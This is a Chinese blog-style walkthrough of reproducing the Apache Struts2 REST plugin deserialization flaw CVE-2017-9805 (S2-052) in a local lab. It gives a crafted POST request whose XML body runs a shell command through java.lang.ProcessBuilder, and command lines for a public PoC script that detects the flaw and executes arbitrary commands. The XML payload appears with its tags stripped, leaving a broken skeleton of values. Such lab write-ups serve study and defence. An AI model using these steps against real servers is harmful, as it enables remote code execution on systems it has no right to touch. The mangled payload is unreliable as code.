S2-052 远程代码执行漏洞检查利用

2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。

漏洞记录

漏洞编号:CVE-2017-9805(S2-052)
影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
漏洞详情:http://struts.apache.org/docs/s2-052.html

漏洞说明

Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件,其根据Content-Type或URI扩展名来判断用户传入的数据包类型,有如下映射表:
S2-052 远程代码执行漏洞检查利用_第1张图片
jsonlib无法引入任意对象,而xstream在默认情况下是可以引入任意对象的(针对1.5.x以前的版本),方法就是直接通过xml的tag name指定需要实例化的类名:


//或者

所以,我们可以通过反序列化引入任意类造成远程命令执行漏洞,只需要找到一个在Struts2库中适用的gedget。

漏洞复现

启动环境后,访问http://192.168.1.15:8080/orders.xhtml即可看到showcase页面。
S2-052 远程代码执行漏洞检查利用_第2张图片
由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改orders.xhtml为orders.xml或修改Content-Type头为application/xml,即可在Body中传递XML数据。
所以,最后发送的数据包为:
编辑页面,打开抓包工具在提交信息前设置代理,抓包–>然后改包
将抓取的包改为如下:
修改POST数据包如下:

POST /orders/3/edit HTTP/1.1
Host: 192.168.1.15:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/xml
Content-Length: 2415


  
    
      0
      
        
          
            
              
                false
                0
                
                  
                    
                    
                      
                        touch
                        /tmp/success
                      
                      false
                    
                  
                  
                    
                      java.lang.ProcessBuilder
                      start
                      
                    
                    foo
                  
                  foo
                
                
              
              
              
              false
              0
              0
              false
            
            false
          
          
        
        0
      
    
    
  
  
    
    
  

S2-052 远程代码执行漏洞检查利用_第3张图片
以上数据包成功执行的话,会在docker容器内创建文件/tmp/success,执行docker-compose exec struts2 ls /tmp/即可看到。

漏洞poc检测与利用

poc下载:
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
检测到漏洞存在:

python apache-struts-pwn.py -u 'http://192.168.1.15:8080/orders/3/edit'

S2-052 远程代码执行漏洞检查利用_第4张图片
漏洞利用写入文件

python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'

参考链接:
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md

S2-052 远程代码执行漏洞检查利用_第5张图片

你可能感兴趣的:(漏洞利用)